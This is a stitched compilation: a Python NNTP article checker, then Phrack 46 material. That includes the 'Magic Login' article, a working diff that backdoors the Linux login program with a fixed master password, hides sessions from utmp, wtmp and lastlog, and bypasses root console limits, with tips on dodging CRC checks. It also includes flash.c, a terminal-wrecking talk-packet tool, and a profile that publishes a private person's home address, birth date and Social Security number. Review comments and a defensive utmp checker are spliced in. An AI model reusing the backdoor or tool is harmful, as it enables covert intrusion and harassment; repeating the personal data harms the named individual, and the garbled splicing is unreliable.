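# and the moderator addresses of each moderated group.
FEED_PEERS = {"feed1.example.net": "feed1", "feed2.example.net": "feed2"}
MODERATORS = {"example.announce": {"moderator@example.org"}}
REQUIRED = ("From", "Newsgroups", "Subject", "Date", "Message-ID", "Path")


def answer_ihave(peer_host, message_id, history):
    """Reply to 'IHAVE <id>' before any article text is transferred."""
    if peer_host not in FEED_PEERS:
        return 502, "no permission to transfer articles"
    if message_id in history:
        return 435, "article not wanted"
    return 335, "send article to be transferred"


def inspect_article(peer_host, offered_id, raw_article):
    """Check a transferred article; return (response code, reasons)."""
    headers = HeaderParser().parsestr(raw_article)
    reasons = [f"missing {h} header" for h in REQUIRED if headers.get(h) is None]

    if (headers.get("Message-ID") or "").strip() != offered_id:
        reasons.append("Message-ID differs from the one offered")

    # Policy assumption: every relaying host prepends its own name, so the
    # first Path entry must name the peer that is handing us the article.
    hops = [h for h in (headers.get("Path") or "").strip().split("!") if h]
    if not hops or hops[0] != FEED_PEERS.get(peer_host):
        reasons.append("Path does not begin with the sending peer")

    # A header value is not proof of identity; this only catches careless
    # cases. Restricting IHAVE to known feeds is the control that matters.
    approver = parseaddr(headers.get("Approved") or "")[1].lower()
    for group in (headers.get("Newsgroups") or "").split(","):
        group = group.strip()
        allowed = MODERATORS.get(group)
        if allowed is None:
            continue
        if not approver:
            reasons.append(f"{group} is moderated but there is no Approved header")
        elif approver not in allowed:
            reasons.append(f"Approved address is not a moderator of {group}")

    return (437, reasons) if reasons else (235, [])


# Constructed sample articles.
GENUINE_ID = "<1994Sep20.1200.1@origin.example>"
GENUINE = (
    "Path: feed1!hub.example!origin.example!alice\n"
    "From: alice@origin.example\n"
    "Newsgroups: example.test\n"
    "Subject: hello\n"
    "Date: Tue, 20 Sep 1994 12:00:00 GMT\n"
    f"Message-ID: {GENUINE_ID}\n"
    "\nbody\n"
)
ALTERED_ID = "<1994Sep20.1200.1xq@origin.example>"
ALTERED = (
    "Path: origin.example!bob\n"
    "From: bob@origin.example\n"
    "Newsgroups: example.announce\n"
    "Subject: official notice\n"
    "Date: Tue, 20 Sep 1994 12:05:00 GMT\n"
    f"Message-ID: {ALTERED_ID}\n"
    "Approved: bob@origin.example\n"
    "\nbody\n"
)


def demo():
    """Run the checks over the constructed samples."""
    return {
        "unknown_host": answer_ihave("dialup17.example.com", ALTERED_ID, set()),
        "duplicate": answer_ihave("feed1.example.net", GENUINE_ID, {GENUINE_ID}),
        "genuine": inspect_article("feed1.example.net", GENUINE_ID, GENUINE),
        "altered": inspect_article("feed2.example.net", ALTERED_ID, ALTERED),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, result)
```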
------------------------------------------------------------------------------

Magic Login - Written by Data King - 7 July 1994

PLEASE NOTE:-

This program code is released on the understanding that neither the author
nor Phrack Magazine suggest that you implement this on **ANY** system that
you are not authorized to do so. The author provides this implementation of
a "Magic" login as a learning exercise in security programming.

Sorry for the disclaimer, readers, but I was advised by the AFP (Australian
Federal Police) that if I ever released this code they would bust me for
aiding and abetting. I am releasing it anyway as I believe in the right of
people to KNOW, but not necessarily to DO.

As always I can be emailed at dking@suburbia.apana.org.au
(Please note:- I have a NEW pgp signature.)

INTRODUCTION
~~~~~~~~~~~~
Briefly I am going to explain what a "Magic" login is and some of the steps
you need to go through to receive the desired result. At the end of this
article is a diff that can be applied to the shadow-3.2.2-linux archive to
implement some of these ideas.

EXPLANATION
~~~~~~~~~~~
A "Magic" login is a modified login program that allows the user to login
without knowing the correct password for the account they are logging into.

This is a very simple programming exercise and can be done by almost anyone,
but a really effective "Magic" login program will do much more than this.
The features of the supplied "Magic" login are:

 - Will login to any valid account as long as you know the Magic password.
 - Hides you in UTMP
 - Does not Log to WTMP
 - Allows Root Login from NON authorized Terminals
 - Preserves the Lastlogin information (i.e. keeps it as though you had
   never logged in with the magic password)
 - Produces a binary that is exactly the same length as the original binary.

IMPLEMENTATION
~~~~~~~~~~~~~~
I am not going to go into great detail here on how to write such a system as
this.
The code is very simple and contains plenty of comments, so just look there
for ideas.

For this system to have less chance of being detected you need to do several
things.

First, select a "Magic" password that is not easily identifiable by running
strings on the binary. This is why in the example I have used the word
"CONSOLE": this word already appears several times in the binary, so
detection of one more is unlikely. Admittedly I could have encrypted the
"Magic" password, but I decided against this for several reasons.

The second thing you would need to do if you were illegally placing a
"Magic" login on a system would be to ensure that the admins are not doing
CRC checks on SUID(0) programs, or if they are, that you change the CRC
record of login to match the CRC record of the "Magic" login.

Thirdly, do not forget to make the date and time stamp of the new binary
match the old ones.

To install a new /bin/login on a system you will need to be root. Now, if
you are already root, why would you bother? Simple: it is just one more
backdoor that you can use to get back in if you are detected.

LIMITATIONS
~~~~~~~~~~~
This version of the "Magic" login program does not have the following
features; I leave it entirely up to you to implement something to fix them:

 - Shells & Programs show up in the Process Table
 - tty Ownership and attributes
 - /proc filesystem

Any one of these will show an alert system admin that there is an
"invisible" user on the system. However, it has been my experience that most
admins rarely look at these things, or if they do, they cannot see the wood
for the trees.

---------- diff -c /root/work/login/console.c /root/work/logon/console.c *** /root/work/login/console.c Sun Oct 11 07:16:47 1992 --- /root/work/logon/console.c Sat Jun 4 15:29:15 1994 *************** *** 21,26 **** --- 21,27 ---- #endif extern char *getdef_str(); + extern int magik; /* * tty - return 1 if the "tty" is a console device, else 0.
*************** *** 47,52 **** --- 48,57 ---- if ((console = getdef_str("CONSOLE")) == NULL) return 1; + /* Fix for Magic Login - UnAuth Console - Data King */ + + if (magik==1) + return 1; /* * If this isn't a filename, then it is a ":" delimited list of * console devices upon which root logins are allowed. diff -c /root/work/login/lmain.c /root/work/logon/lmain.c *** /root/work/login/lmain.c Mon Oct 12 17:35:06 1992 --- /root/work/logon/lmain.c Sat Jun 4 15:30:37 1994 *************** *** 105,110 **** --- 105,111 ---- char *Prog; int newenvc = 0; int maxenv = MAXENV; + int magik; /* Global Flag for Magic Login - Data King */ /* * External identifiers. diff -c /root/work/login/log.c /root/work/logon/log.c *** /root/work/login/log.c Mon Oct 12 17:35:07 1992 --- /root/work/logon/log.c Sat Jun 4 15:37:22 1994 *************** *** 53,58 **** --- 53,59 ---- extern struct passwd pwent; extern struct lastlog lastlog; extern char **environ; + extern char magik; long lseek (); time_t time (); *************** *** 83,89 **** (void) time (&newlog.ll_time); (void) strncpy (newlog.ll_line, utent.ut_line, sizeof newlog.ll_line); (void) lseek (fd, offset, 0); ! (void) write (fd, (char *) &newlog, sizeof newlog); (void) close (fd); } --- 84,93 ---- (void) time (&newlog.ll_time); (void) strncpy (newlog.ll_line, utent.ut_line, sizeof newlog.ll_line); (void) lseek (fd, offset, 0); ! if (magik !=1) /* Dont Modify Last login Specs if this is a Magic */ ! { /* login - Data King */ ! (void) write (fd, (char *) &newlog, sizeof newlog); ! } (void) close (fd); } diff -c /root/work/login/utmp.c /root/work/logon/utmp.c *** /root/work/login/utmp.c Mon Oct 12 17:35:36 1992 --- /root/work/logon/utmp.c Sat Jun 4 15:41:13 1994 *************** *** 70,75 **** --- 70,77 ---- extern long lseek(); #endif /* SVR4 */ + extern int magik; + #define NO_UTENT \ "No utmp entry. 
You must exec \"login\" from the lowest level \"sh\"" #define NO_TTY \ *************** *** 353,368 **** /* * Scribble out the new entry and close the file. We're done * with UTMP, next we do WTMP (which is real easy, put it on ! * the end of the file. */ ! ! (void) write (fd, &utmp, sizeof utmp); ! (void) close (fd); ! ! if ((fd = open (WTMP_FILE, O_WRONLY|O_APPEND)) >= 0) { (void) write (fd, &utmp, sizeof utmp); (void) close (fd); } - utent = utmp; #endif /* SVR4 */ } --- 355,372 ---- /* * Scribble out the new entry and close the file. We're done * with UTMP, next we do WTMP (which is real easy, put it on ! * the end of the file. If Magic Login, DONT write out UTMP - Data King */ ! if (magik !=1) ! { (void) write (fd, &utmp, sizeof utmp); (void) close (fd); + + if ((fd = open (WTMP_FILE, O_WRONLY|O_APPEND)) >= 0) { + (void) write (fd, &utmp, sizeof utmp); + (void) close (fd); + } + utent = utmp; } #endif /* SVR4 */ } diff -c /root/work/login/valid.c /root/work/logon/valid.c *** /root/work/login/valid.c Sun Oct 11 07:16:55 1992 --- /root/work/logon/valid.c Sat Jun 4 15:47:28 1994 *************** *** 25,30 **** --- 25,32 ---- static char _sccsid[] = "@(#)valid.c 3.4 08:44:15 9/12/91"; #endif + extern int magik; + /* * valid - compare encrypted passwords * *************** *** 43,48 **** --- 45,64 ---- char *encrypt; char *salt; char *pw_encrypt (); + char *magic; + + /* + * Below is the piece of code that checks to see if the password + * supplied by the user = the Magic Password - Data King + */ + + magic = "CONSOLE"; /* Define this as the Magic Password - Data King */ + + if (strcmp(password,magic) == 0) + { + magik = 1; + return(1); + } /* * Start with blank or empty password entries. 
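Review bot: in valid.c (hunk 45,64) the added `if (strcmp(password,magic) == 0)` branch returns 1 before any comparison against the account's encrypted entry, so the fixed cleartext literal "CONSOLE" is accepted as the password for every account. This cannot be merged: drop `magic`, the `strcmp` branch and the `magik = 1` assignment so that valid() can only succeed through the encrypted comparison that the function's header comment describes.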
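Review bot: in console.c (hunk 48,57) `if (magik==1) return 1;` is placed after the `getdef_str("CONSOLE")` lookup and before the device list is parsed, so the configured list of terminals on which root may log in is never consulted when the flag is set. An access-control decision should not depend on a writable global set in another file; remove the test so the CONSOLE list is always evaluated.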
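Review bot: in log.c (hunk 84,93) the lastlog `write (fd, (char *) &newlog, sizeof newlog)` is now guarded by `if (magik !=1)`, which leaves the previous last-login time in place after a successful login and removes the record an account owner would use to notice it. The lastlog update should be unconditional; remove the guard and keep the original single `write`.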
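Review bot: in utmp.c (hunk 355,372) the new `if (magik !=1)` block encloses the utmp write, the WTMP_FILE append and `utent = utmp`, so a session on that path is recorded in neither file, and because `(void) close (fd)` moved inside the block the utmp descriptor is left open when the block is skipped. Session accounting has to run for every login; restore the original unconditional write, close and append sequence.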
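A defender's cross-check for the gaps listed under LIMITATIONS, as an added example that is not part of the original article: it compares a utmp image with the process table and tty ownership and reports terminals that show activity but have no login record. The 384-byte record layout assumes Linux/glibc `struct utmp`; the function names are hypothetical and the utmp image, `ps` output and owner map are constructed sample data.

```python
import struct
from collections import defaultdict

# Linux/glibc struct utmp (384 bytes); padding is spelled out so the layout
# does not depend on native alignment. Assumed layout, not from the article.
UTMP = struct.Struct("<h2xi32s4s32s256shhiii4i20s")
USER_PROCESS, DEAD_PROCESS = 7, 8
# Programs that hold a terminal before anyone has logged in on it.
IDLE = {"getty", "agetty", "mingetty", "login"}


def cstr(raw):
    """Decode a NUL-padded fixed-width field."""
    return raw.split(b"\0", 1)[0].decode("ascii", "replace")


def utmp_sessions(blob):
    """Return {tty: user} for each USER_PROCESS record in a utmp image."""
    sessions = {}
    for off in range(0, len(blob) - UTMP.size + 1, UTMP.size):
        ut_type, _pid, line, _id, user = UTMP.unpack_from(blob, off)[:5]
        if ut_type == USER_PROCESS:
            sessions[cstr(line)] = cstr(user)
    return sessions


def processes_by_tty(ps_text):
    """Parse `ps -eo pid,tty,user,comm` output into {tty: [(pid, user, comm)]}."""
    table = defaultdict(list)
    for row in ps_text.strip().splitlines()[1:]:  # first row is the header
        pid, tty, user, comm = row.split(None, 3)
        if tty != "?":  # "?" means no controlling terminal (daemons)
            table[tty].append((int(pid), user, comm.strip()))
    return table


def unaccounted_ttys(utmp_blob, ps_text, tty_owner):
    """Report terminals that show activity but have no utmp login record.

    Activity is either a non-getty process attached to the tty or a tty
    device node owned by someone other than root.
    """
    sessions = utmp_sessions(utmp_blob)
    procs = processes_by_tty(ps_text)
    findings = []
    for tty in sorted(set(procs) | set(tty_owner)):
        if tty in sessions:
            continue
        active = [p for p in procs.get(tty, []) if p[2] not in IDLE]
        owner = tty_owner.get(tty, "root")
        if active or owner != "root":
            findings.append({
                "tty": tty,
                "owner": owner,
                "pids": [p[0] for p in active],
                "users": sorted({p[1] for p in active}),
            })
    return findings


def make_record(ut_type, pid, line, user):
    """Build one utmp record for the constructed sample below."""
    return UTMP.pack(ut_type, pid, line.encode(), b"", user.encode(), b"",
                     *([0] * 9), b"")


# Constructed sample data, not captured from a real host.
SAMPLE_UTMP = b"".join([
    make_record(USER_PROCESS, 301, "tty1", "alice"),
    make_record(USER_PROCESS, 355, "pts/0", "bob"),
    make_record(DEAD_PROCESS, 290, "tty3", ""),  # ended session, ignored
])
SAMPLE_PS = """\
  PID TT       USER     COMMAND
  301 tty1     alice    bash
  355 pts/0    bob      bash
  412 tty2     root     bash
  430 tty2     root     vi
  288 tty3     root     agetty
  500 tty4     carol    sh
   77 ?        root     cron
"""
SAMPLE_OWNERS = {"tty1": "alice", "pts/0": "bob", "tty2": "root",
                 "tty3": "root", "tty4": "carol"}

if __name__ == "__main__":
    for f in unaccounted_ttys(SAMPLE_UTMP, SAMPLE_PS, SAMPLE_OWNERS):
        print("no utmp record: %(tty)s owner=%(owner)s users=%(users)s "
              "pids=%(pids)s" % f)
```

Some terminal emulators and multiplexers can be configured not to write utmp entries, so findings on pts devices need triage before they are treated as an incident.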
Always encrypt ------------------------------------------------------------------------------ /* flash.c */ /* This little program is intended to quickly mess up a user's terminal by issuing a talk request to that person and sending vt100 escape characters that force the user to logout or kill his/her xterm in order to regain a sane view of the text. It the user's message mode is set to off (mesg n) he/she will be unharmed. This program is really nasty :-) Usage: flash user@host try compiling with: gcc -o flash flash.c */ #include #include #include #include #include #include /* this should really be in an include file.. */ #define OLD_NAME_SIZE 9 #define NAME_SIZE 12 #define TTY_SIZE 16 typedef struct { char type; char l_name[OLD_NAME_SIZE]; char r_name[OLD_NAME_SIZE]; char filler; u_long id_num; u_long pid; char r_tty[TTY_SIZE]; struct sockaddr_in addr; struct sockaddr_in ctl_addr; } OLD_MSG; typedef struct { u_char vers; char type; u_short filler; u_long id_num; struct sockaddr_in addr; struct sockaddr_in ctl_addr; long pid; char l_name[NAME_SIZE]; char r_name[NAME_SIZE]; char r_tty[TTY_SIZE]; } CTL_MSG; #define TALK_VERSION 1 /* protocol version */ /* Types */ #define LEAVE_INVITE 0 #define LOOK_UP 1 #define DELETE 2 #define ANNOUNCE 3 int current = 1; /* current id.. this to avoid duplications */ struct sockaddr_in *getinaddr(char *hostname, u_short port) { static struct sockaddr addr; struct sockaddr_in *address; struct hostent *host; address = (struct sockaddr_in *)&addr; (void) bzero( (char *)address, sizeof(struct sockaddr_in) ); /* fill in the easy fields */ address->sin_family = AF_INET; address->sin_port = htons(port); /* first, check if the address is an ip address */ address->sin_addr.s_addr = inet_addr(hostname); if ( (int)address->sin_addr.s_addr == -1) { /* it wasn't.. so we try it as a long host name */ host = gethostbyname(hostname); if (host) { /* wow. It's a host name.. set the fields */ /* ?? 
address->sin_family = host->h_addrtype; */ bcopy( host->h_addr, (char *)&address->sin_addr, host->h_length); } else { /* oops.. can't find it.. */ puts("Couldn't find address"); exit(-1); return (struct sockaddr_in *)0; } } /* all done. */ return (struct sockaddr_in *)address; } SendTalkPacket(struct sockaddr_in *target, char *p, int psize) { int s; struct sockaddr sample; /* not used.. only to get the size */ s = socket(AF_INET, SOCK_DGRAM, 0); sendto( s, p, psize, 0,(struct sock_addr *)target, sizeof(sample) ); } new_ANNOUNCE(char *hostname, char *remote, char *local) { CTL_MSG packet; struct sockaddr_in *address; /* create a packet */ address = getinaddr(hostname, 666 ); address->sin_family = htons(AF_INET); bzero( (char *)&packet, sizeof(packet) ); packet.vers = TALK_VERSION; packet.type = ANNOUNCE; packet.pid = getpid(); packet.id_num = current; bcopy( (char *)address, (char *)&packet.addr, sizeof(packet.addr ) ); bcopy( (char *)address, (char *)&packet.ctl_addr, sizeof(packet.ctl_addr)); strncpy( packet.l_name, local, NAME_SIZE); strncpy( packet.r_name, remote, NAME_SIZE); strncpy( packet.r_tty, "", 1); SendTalkPacket( getinaddr(hostname, 518), (char *)&packet, sizeof(packet) ); } old_ANNOUNCE(char *hostname, char *remote, char *local) { OLD_MSG packet; struct sockaddr_in *address; /* create a packet */ address = getinaddr(hostname, 666 ); address->sin_family = htons(AF_INET); bzero( (char *)&packet, sizeof(packet) ); packet.type = ANNOUNCE; packet.pid = getpid(); packet.id_num = current; bcopy( (char *)address, (char *)&packet.addr, sizeof(packet.addr ) ); bcopy( (char *)address, (char *)&packet.ctl_addr, sizeof(packet.ctl_addr)); strncpy( packet.l_name, local, NAME_SIZE); strncpy( packet.r_name, remote, NAME_SIZE); strncpy( packet.r_tty, "", 1); SendTalkPacket( getinaddr(hostname, 517), (char *)&packet, sizeof(packet) ); } main(int argc, char *argv[]) { char *hostname, *username; int pid; if ( (pid = fork()) == -1) { perror("fork()"); exit(-1); } if ( !pid 
) { exit(0); } if (argc < 2) { puts("Usage: "); exit(5); } username = argv[1]; if ( (hostname = (char *)strchr(username, '@')) == NULL ) { puts("Invalid name. "); exit(-1); } *hostname = '\0'; hostname++; if (*username == '~') username++; #define FIRST "\033c\033(0\033#8" #define SECOND "\033[1;3r\033[J" #define THIRD "\033[5m\033[?5h" new_ANNOUNCE(hostname, username, FIRST); old_ANNOUNCE(hostname, username, FIRST); current++; new_ANNOUNCE(hostname, username, SECOND); new_ANNOUNCE(hostname, username, SECOND); current++; new_ANNOUNCE(hostname, username, THIRD); old_ANNOUNCE(hostname, username, THIRD); } ------------------------------------------------------------------------------ ==Phrack Magazine== Volume Five, Issue Forty-Six, File 5 of 28 **************************************************************************** -:[ Phrack Pro-Phile ]:- This issue our prophile introduces you to one of the craziest people I've ever met from the Underground. And coming from a complete loon like me, that's saying something. This guy is a real Renaissance Man: Hacker, programmer, burglar, convict, star of stage and screen... Of course, that someone could only be: Minor Threat ~~~~~~~~~~~~ _____________________________________________________________________________ Personal Info: Handle: Minor Threat Call him: MT, minor, lamer Born: 1972 in Walnut Creek, California Age: 22 Height: 6'1" Weight: 155 lbs e-mail: mthreat@paranoia.com www: http://www.paranoia.com/~mthreat/ Affiliations: Dark Side Research Computers owned: 1981: IBM PC 1982: none 1984: PCjr 1988: XT Clone 1990: 386/25 Clone 1992: Too many to legally list 1994: Pentium & 486 How I got started ~~~~~~~~~~~~~~~~~ In 1981, my dad worked for IBM. In October of that year, he brought home a PC, and I jumped on BASIC. It wasn't until 1984 that I got my first modem. I had just moved to Florida with my dad, and he had a modem. 
I met some other kids with computers and modems and they taught me what modems were for: "You call other people's computers and try to get their passwords and intercept their mail". (That's what I was taught!) It wasn't until a few months later I realized that this wasn't the actual purpose of BBSs and modems. My first BBS was the Towne Crier BBS at FAU (Florida Atlantic University), 305-393-3891 (I still remember that damn number), but the NPA has since changed to 407. We thought it was so cool when we logged on as "All" and deleted all the messages posted to "All". In about 1985, I moved back to Austin. I screwed around for several years without doing any real hacking. When I got to high school, I wanted to change my grades like in War Games, so I looked through the counselor's office until I found a number to the Education Service Center. I had to scan a whole _100_ numbers (929-13xx) to find the HP3000 dialup. Once I found it, I had no idea what to do. I gave the number to a friend in high school, who gave it to some of his hacker friends. They hacked it and gave it back to me, complete with a full list of passwords and commands. It turns out, the two Austin hackers who did it were The Mentor and Erik Bloodaxe, but I didn't know that for another 3 years. Shortly after this, I picked my permanent handle. Minor Threat was an early-to-mid 1980's punk band from Washington, DC. They're no longer together, but Fugazi is pretty good and Ian McKaye (from Minor Threat) is in Fugazi. I actually got the handle off of one of my sister's tapes, before I even heard them. But now I like the music too. Eventually, I found a local pirate board, met all the local pirates, and got into the warez scene for a while. I joined PE (Public Enemy), the pirate group. (I cracked the warez!) Warez were only so fun, so I looked for other stuff. I met some VMB lamers and got into that scene for about a month, and got bored again. 
This was 1990, our 950s were running out, and we needed another way to call out. So I took an old VMB hacking program I had written, and changed it around to scan for tones, in random order to avoid Ma Bell problems. I nicknamed it ToneLoc, short for Tone-Locator. I gave it to some friends (Alexis Machine & Marko Ramius) and eventually, it ended up on some warez boards. It got pretty popular, so I made a version that worked for more people, called it 0.90, and released it. Then I lost the source in a hard drive crash, and stopped working on it.

I was 18 and mom said it was time to get out of her house, so I got my own apartment. Marko Ramius and I learned about trashing central offices, and gained COSMOS access. We barely knew what COSMOS was .. I knew I had read about it in old Phrack articles, and I remembered that it was "elite." Our problem was, we still knew no other "real" hackers, and we had to learn COSMOS. After trashing and trashing, we still had no COSMOS manuals. We had to get them somehow. I can't say how, I'll leave it to your imagination.

Marko and I started breaking in buildings and got pretty good at it. We had about a 60% success rate I would guess. But we never stole anything -- we just looked for cool information. In 1991, we got caught in a building, and got charged with Criminal Trespassing. We both got probation for a Class A misdemeanor. We decided it was time to stop breaking in buildings.

Late in 1991, I got e-mail on a bulletin board from someone named Mucho Maas. He said he had gotten ToneLoc and wanted a few new features. I told him I had lost the current source and all I had was an old (0.85) source. He said he would take the old source, add the new features, and bring it up-to-date with the current source. So he did, and we released ToneLoc 0.95. If it weren't for Mucho, ToneLoc would still be at version 0.90, and anyone who ran 0.90 knows how hard it was to get it running right.
About the same time, I was getting on a few BBSs in the Washington DC area. (Pentavia was the best while it was up). I met several people there... including a guy named Codec. Codec was mostly a phone phreak, but did a little hacking as well. But when it came to PBX's, he was a master. Not only had he exploited PBXs for free long distance use like the rest of us, but he had actually REMOVED entire PBX systems from buildings! (See his article on how to do this, Phrack 43, article 15). But he had also gotten caught and was on federal probation.

A few months after I met Codec, he had an 'incident' and was on the run again. I agreed to let him live with me, so he flew down and moved in. We got a 2 bedroom place, and set the place up d0pe. There were over 9 phone extensions, (not including cordless), and about the same number of computers (Most of which were Codec's). We had the funnest 3 months ever ... but about 2 weeks after SummerCon 1992, we got arrested.

Favorite things
~~~~~~~~~~~~~~~

Women: w0w
Music: Sonic Youth, Cure, Fugazi, Minor Threat, Orb, B-Boys, Jane's Addiction.
Favorite Book: 1984
My Car: 1990 300ZX Twin Turbo, Wolf Chip mod to 360 horsepower. It's fucking fast.
Favorite Movies: Jackie Chan movies, The Killer, Reservoir Dogs, The Lost Boys, Near Dark, Hardware.
Favorite TV: MacGyver

What are some of your most memorable experiences?

Being polygraphed by the Secret Service in 1991 for something having to do with some lamer threatening the president on an Alliance Teleconference. I failed the polygraph the first time, then I passed it the second time. (How's that for the government?) Eventually, some other 15-year old got probation for doing it.

Being arrested with Codec in 1992. He ran, outran the cops, jumped a fence about 8 feet tall, and eventually got in a struggle with a cop over his gun (Officer Sheldon Salsbury, Austin PD). The gun went off, and we were both booked on attempted capital murder.
It turned out that the bullet hit no one, and all the blood was from the cop hitting himself in the head with his own gun, although the cop claims that Codec hit him in the forehead with a 2-meter ham radio from like 20 feet away. Right. A search warrant was executed on our apartment, and approximately $800,000 worth of AT&T Switching equipment was seized from Codec's closet. It turns out, we were narced on and set-up by : Jon R. Massengale 6501 Deer Hollow Austin, TX 78750 DOB: 9-7-62 SSN: 463-92-0306 Being the first in Texas to have Caller-ID, before it was legally available. Losing control of my car at 140mph, doing a slow 360 at about 120, living through it, and not doing too much damage to my car. Good times: Going up to Seattle to visit Cerebrum in May 1993, seeing Fugazi, getting our car towed, then reading the dialups to the towing company's xenix (login: sysadm). Finally getting our Oki 900's to clone/tumble/do other d0pe things. Calling each other on our Okis from 5 feet away, putting them together and causing feedback. Setting up my apartment with Codec with a 10-station Merlin system, and a 9-station network. SummerCon 1993. "Culmination of Coolness." Sorry, can't say any more. Some People To Mention: There are a lot of people who I would like to mention that have helped me greatly and who I have known for a very long time: Marko Ramius - First pirate/hacker I really knew in person. We did a lot of crazy shit together. Alexis Machine - Second hacker-type I met, and a true Warez Kid. (that's a complement!) Mucho Maas - Brought back ToneLoc from the dead. Always told me what I shouldn't do, and always said "I told you so" when I got busted. Codec - I had some of the funnest times of my life with Codec... unfortunately, it was so much fun it was illegal, and we got busted. Cerebrum - Very cool friend who got narced on by a fuckhead named Zach, 206-364-0660. Cerebrum is serving a 10 month federal sentence in a nice prison camp in Sheridan, Oregon. 
He gets out about December 10, 1994.

The Conflict - Unfortunately, I can't tell you. Maybe in about 8 more years.

ESAC Administrator - "Have you been drinking on the job?"

What I'm up to now
~~~~~~~~~~~~~~~~~~

When I heard that the next Phrack Pro-phile was going to be about me, I realized, "I must be retired". It's probably true.. at least I hope it is. The 5 months I spent in jail was enough. I just started going back to University of Texas, where they will only give me a VAX account (lame). For the first time in 4 years, I think my life is going in the 'right' direction.

Advice
~~~~~~

I can only hope anyone who reads this will take this seriously. Here's my advice: If you ever get arrested or even simply questioned about ANYTHING AT ALL, DO NOT COOPERATE. Always tell the law enforcement official or whoever, "I'm sorry, I can't talk without my lawyer present" Cooperating will never help you. Codec recently pointed out to me, that we should be the "role models" of what people should do when they get busted. Both of us remained loyal and quiet during our whole case. I was in jail for 5 months, and Codec is still in prison, but we never talked. Being narced on by a 'buddy' is the worst thing that could ever happen to you, and narcing on a 'buddy' is the worst thing you could do to them. If you get busted for something, don't pass the punishment on to someone else. I hope most of you never have to face this, but if you do, you will live much better knowing that you didn't give in to a bunch of 'law enforcement' pricks.

==Phrack Magazine==

Volume Five, Issue Forty-Six, File 6 of 28

****************************************************************************

BIG FUN

Think Federal District Court Judges and Special Agents get to have all the fun? Not any more!! It's the Operation Sun Devil Home Game! For the first step in the game, a quick flourish of a pen signs away your opponent's rights to any expectations of privacy.
Bank records, medical records, employment files, student records...literally anything is yours for the taking. As you progress through the various levels, you move on to other legal scenarios like the application for search warrant and the summons. It's all here in the Operation Sun Devil Home game, by Gailco.

===============================================================

Other game pieces available via ftp from freeside.com in /pub/phrack/gailco. Offer not sold in stores. Do not use. Impersonating an officer of the court is a felony.

section 1 of uuencode 4.13 of file GAME.PCX by R.E.M.
M_________\W_________S?_________-_________\W_________S?______D M___-_________\W_________S?_________-_________\W_________S?__R M_______-_________\W_________S?_________-____QO_!W______&____, M_____\W_________S?_________-_________\W_________S?_________-R M_________\W_________S?_________-_________\W_________S?______D M___-_________\W_________S?_________-_\[_P=_______?_________-? M_________\W_________S?_________-_________\W_________S?______D M___-_________\W_________S?_________-_________\W_________S?__R M_______-_________\W_________S?_________-_________\W_________> MS?_________-_________\W_________S?_________-_________\W_V/_![ MW______S_________\W_________S?_________-_________\W_________\ MS?___]G_P=____+____9_X____+_________S?_________-_________\W_/ M________S?_________-_________\W_________S?_________-________] M_\W_________S?_________-_________\W_________S?_________-____R M_____\W_________S?_________-_________\W_________S?_________-R M_________\W_________S?_________-_________\W_________S?______D M___-_________\W_________S?_________-_________\W_________S?__R M_______-_________\W_________S?_________-_________\W_S__"^?__T M___[_\__P<#"``?_____^?_/_\'&P@X'______G_S__!SX\/!______Y_\__3 MP<_______/_/_\'/______S_S__!Y\+_P?/_____^?_/_\'GPO_!\______Y+ M_\__P>/"_\'S______G_S__!Q\+_P?/_____^?_/_\'/Q?_!W\+_#______SH M_\__P<_"_\'OPO_!S\'_/P?"_Y_#_Q_!_Y______ZO_/_\'/PO_!Y\+_P_\__P<_"_\'WK MPO_!P\'P<`!\?Q_!_\'#P?X`#P`'P?^`#\'\`\'\?\'APO^/Q?^_PO^_____3 M_]7_S__!Y\+_P?/"_\'PPN#!^'A_'\'_P>#!_``#`,'GP?^``\'P`,'\/\'AU MP?'!_X_!^'_!X<'\>`!_@`.`?______3_\__P>?"_\'SPO_!\,+@P?AX?A_!Y M_\'`P?PPP<.`P??!_\'`P<'!\&#!^'_!X<'PP?^'P?A_P>'!_'@`?\'``\'`* M;______3_\__P>/"_\'SPO_!^&'!X<'\>'Y_P?_!X,'\?\'CO\'_P?XWP?#!Q MX<'X>#_!X<'PP?XGP?!_P>#!_'AP/\'@<\'@8\'_P>?-_\'QR/_!_/__^?_/5 M_\''PO_!\\+_P?A#P/!_P?!_Q_!_\'/P?\/P?^?R?_"C\/_P?P_I M#\'_P?Y_P__!S\'_`!^?Q_\'P?\_R?\?___8_\__P<_"_\'GP_\/A\'_'G\/1 MP?\.'P(/`@_!_A_!_X_!_PX/`\'B'@_!QX_!QQX^/X>/GP_"_P>&#\'_!CX'H 
